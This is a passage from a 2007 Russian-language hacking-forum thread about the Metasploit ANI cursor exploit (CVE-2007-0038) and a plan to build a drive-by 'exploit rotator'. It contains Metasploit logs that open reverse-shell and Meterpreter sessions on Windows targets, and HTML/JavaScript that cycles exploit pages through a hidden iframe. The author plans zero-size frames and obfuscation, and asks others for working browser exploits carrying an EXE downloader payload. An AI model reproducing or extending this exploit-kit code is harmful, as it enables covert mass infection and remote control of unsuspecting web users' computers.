ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 05.04.2007, 10:31
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


Unhappy

Затестил сегодня сплоит windows/browser/ani_loadimage_chunksize на WIN-XP-SP2+IE 6.0 - пока не работает, IE не валит, полезную нагрузку не выполняет, сессию не открыватет. Придётся ждать, когда его код доведут до ума, чтоб можно было исполнить начинку...
 
Ответить с цитированием

  #12  
Старый 05.04.2007, 18:13
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Кто тестил ? На viste ?
На оффсайте показано, что работает:
Цитата:
msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Using URL: http://10.4.4.1:8080/foo
[*] Server started.
[*] Exploit running as background job.

msf exploit(ani_loadimage_chunksize) >
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.4.4.1:4444 -> 10.4.4.2:49310)

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VMVX86
OS : Windows Vista (Build 6000, ).
meterpreter > execute -f cmd

[-] stdapi_sys_process_execute: Operation failed: 5
meterpreter >
Кто не хочет делать обновление релиза 3.0 можете скачать сплоит отдельно тут.
У кого виста + msf 3.0 релиз может затестите? На XP-SP2, цели 0,1,2 чёт не пашет
 
Ответить с цитированием

  #13  
Старый 05.04.2007, 19:39
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию

Цитата:
Сообщение от systeminfo  
Название ОС: MicrosoftR Windows VistaT Ultimate
Версия ОС: 6.0.6000 Н/Д сборка 6000
У меня не заработал сплойт.
 
Ответить с цитированием

  #14  
Старый 10.04.2007, 17:28
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Кароче есть функция:
Код:
function changePage() {
		document.getElementById( "ifrm" ).src = sites[currentPage];
	 }
Вызываем в теле функцию:
Код:
<body onload="changePage()">
	<iframe id="ifrm" src=""/>
  </body>
и получаем в Ифрейме нужную страничку.

А мне хотелось бы не в Ифрейме, а просто перенаправить на неё юзера. И открыть в этом же (не в новом) окне. Как реализовать?
 
Ответить с цитированием

  #15  
Старый 11.04.2007, 14:04
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Модернизируем так:
Цитата:
function changePage() {
return sites[currentPage];
}

</script>

<body onload="var page=changePage(); javascript:location.replace(page)">
Перенаправляем юзера на нужную страницу в зависимости от ситуации (а их может быть 256 - про запас ). Ну я от Маков пока отказался, так, что 128. А странички будут уже содержать ротацию сплоитов. Вообщем приступаем к созданию страницы с ротацией сплоитов (универсальной) - то есть запихнём в её IFRAME все наши сплоиты, а потом можно будет вычеркнуть, те которые заведомо не подходят под конкретную ситуацию (Браузер, систему).
 
Ответить с цитированием

  #16  
Старый 11.04.2007, 15:12
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Типовой код файла rotor[N].html
Код:
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>rotor0</title>
</head>


<script type="text/javascript">
      sploits = new Array();
      currentSploit = 0;
      //тут заменим наши сайты вредоносными страницами, которые будут содержать эксплоиты.
      sploits[0] = "0.html";
      sploits[1] = "1.html";
      sploits[2] = "2.html";
      sploits[3] = "3.html";
      sploits[4] = "4.html";
      sploits[5] = "5.html";
      sploits[6] = "6.html";
      sploits[7] = "7.html";
      sploits[8] = "8.html";
      sploits[9] = "9.html";
      sploits[10] = "10.html";
      sploits[11] = "11.html";
      function changeSploit() {
        document.getElementById( "ifrm" ).src = sploits[currentSploit];
        currentSploit++;
        if (currentSploit >= sploits.length) {
          currentSploit = 0;
        }
      }
      setInterval( "changeSploit()", 5000 );
    </script>

  <body onload="changeSploit()">
<iframe id="ifrm" src="" style="text-align: Justify; padding-left:0px; padding-top:0px; height: 5%; width:10%; ">
  </body>
</html>
Проверим - работает во всех трёх браузерах.
Интервал потом надо будет уточнить, так как некоторым сплоитам на переполнение необходимо много времени, также набор сплоитов и количество для каждой ситуации будет свой. Не забудем потом сделать размер фрейма нулевым и про обфускацию html кода.
 
Ответить с цитированием

  #17  
Старый 12.04.2007, 11:24
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Вот сделал подборку документации по Ruby (ведь все сплоиты в пакете на нём написаны) в chm всем качать скачать

Последний раз редактировалось -=lebed=-; 12.04.2007 в 11:48..
 
Ответить с цитированием

Пояснения к сплоиту.
  #18  
Старый 13.04.2007, 21:58
slesh
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241

Репутация: 3349


Отправить сообщение для slesh с помощью ICQ
По умолчанию Пояснения к сплоиту.

Народ, а вы случайно не подумали для чего в сплоите ANI есть такие стоки:

[I]# Should work for all English XP SP2
[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],

Просто этот адресм может постоянно меняться в зависимости от версии винды и языка. Даже патчи влияют на эти адреса.
Поэтому мне кажется что смысл такого сплоита - нулевой. при нормальных условиях.
Т.е. можно создать скрипт с базой этих адресов. И перебирать все адреса!
 
Ответить с цитированием

  #19  
Старый 30.04.2007, 17:22
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Затестил сплоит windows/browser/ani_loadimage_chunksize с начинкой реверсшелл, сработало!
Цитата:
use windows/browser/ani_loadimage_chunksize

>> info windows/browser/ani_loadimage_chunksize


Name: Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)
Version: 4795
Platform: Windows
Privileged: No
License: Metasploit Framework License

Provided by:
hdm <hdm@metasploit.com>
skape <mmiller@hick.org>

Available targets:
Id Name
-- ----
0 Automatic
1 Windows XP SP2 user32.dll 5.1.2600.2622
2 Windows XP SP2 userenv.dll English
3 Windows XP SP2 userenv.dll French
4 Windows XP SP0/SP1 netui2.dll English
5 Windows 2000 SP0-SP4 netui2.dll English
6 Windows Vista user32.dll 6.0.6000.16386
7 Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language
8 Windows XP SP2 userenv.dll English
9 Windows XP SP2 user32.dll (5.1.2600.2180) English
10 Windows XP SP2 userenv.dll Portuguese (Brazil)
11 Windows XP SP1a userenv.dll English
12 Windows XP SP1a shell32.dll English

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.1.33 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit (default is random)

Payload information:
Space: 1234

Description:
This module exploits a buffer overflow vulnerability in the
LoadAniIcon() function of USER32.dll. The flaw is triggered through
Internet Explorer (6 and 7) by using the CURSOR style sheet
directive to load a malicious .ANI file. Internet Explorer will
catch any exceptions that occur while the invalid cursor is loaded,
causing the exploit to silently fail when the wrong target has been
chosen. This module will be updated in the near future to perform
client-side fingerprinting and brute forcing. This vulnerability was
discovered by Alexander Sotirov of Determina and was rediscovered,
in the wild, by McAfee.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-0038
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-1765
http://www.securityfocus.com/bid/23194
http://www.microsoft.com/technet/security/advisory/935423.mspx
http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp
http://www.determina.com/security.research/vulnerabilities/ani-header.html


>> set URIPATH test

URIPATH => test

>> show payloads


Compatible payloads
===================

Name Description
---- -----------
generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline
----------- тут другие начинки, пропущены -------------
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
----------- тут другие начинки, пропущены -------------

>> set PAYLOAD windows/shell_reverse_tcp

PAYLOAD => windows/shell_reverse_tcp

>> set LHOST 192.168.1.33

LHOST => 192.168.1.33

>> exploit
[*] Started reverse handler
[*] Using URL: http://192.168.1.33:8080/test
[*] Server started.
[*] Exploit running as background job.
[*] Command shell session 1 opened

(192.168.1.33:4444 -> 192.168.1.33:3402)

>> sessions -l


Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.1.33:4444 -> 192.168.1.33:3402


>> sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [‚¥àá¨ï 5.1.2600]

(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

D:\Documents and Settings\Admin>

>> dir

dir
’®¬ ¢ ãáâனá⢥ D ¨¬¥¥â ¬¥âªã WIN_XP_SP2

‘¥à¨©ë© ®¬¥à ⮬ : 455F-C2C7
‘®¤¥à¦¨¬®¥ ¯ ¯ª¨ D:\Documents and Settings\Admin

04.12.2006 19:49 <DIR> .
04.12.2006 19:49 <DIR> ..
04.12.2006 19:32 <DIR> ƒ« ¢®¥ ¬¥î
04.12.2006 19:49 <DIR> Œ®¨ ¤®ªã¬¥âë
04.12.2006 19:49 <DIR> ˆ§¡à ®¥
04.12.2006 19:32 <DIR> � ¡®ç¨© á⮫
10.12.2006 19:33 15 .bash_history
11.12.2006 00:23 44 %1
03.02.2007 18:56 <DIR> WINDOWS
30.04.2007 11:11 <DIR> .msf3

3 ä ©«®¢ 100ÿ653 ¡ ©â

9 ¯ ¯®ª 663ÿ971ÿ840 ¡ ©â ᢮¡®¤®

D:\Documents and Settings\Admin>
В кэше IE получается 10 картинок, сам html-код запутан и потом не пашет, если сохранить локально, вместе с картинками...

Последний раз редактировалось -=lebed=-; 30.04.2007 в 20:36..
 
Ответить с цитированием

  #20  
Старый 01.05.2007, 09:57
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Требуется Ваше участие для того чтоб закончить ротатор и сделать альфа версию ротатора с минимальным набором сплоитов (хотя-бы 8-10 последних, актуальных паблик сплоитов) и рабочую, а именно - требуются рабочие=исправленные паблик-сплоиты (HTML) для IE, Opera, FireFox, к которым можно прикрутить шелл-код: загрузчик EXE + исполнение, так как не все сплоиты можно сгенерировать Мetasploit`ом. Пишите в личку или тут, присылайте исправленный рабочий код или давайте ссылки, включу эксплоиты в этот ротатор. В частности нужен windows/browser/ani_loadimage_chunksize - сплоит (на html+java), использующий уязвимость в обработке анимированных курсоров.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Раздача Троя (Или Metasploit Framework часть 2) -=lebed=- Авторские статьи 38 19.05.2009 13:40
Делаем FreeBSD безопасной (Xakep № 69) zl0ba *nix 12 02.03.2009 22:14
Хакеры и кракеры или "Что такое хорошо и что такое плохо?" foreva Чужие Статьи 12 09.02.2008 12:26



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ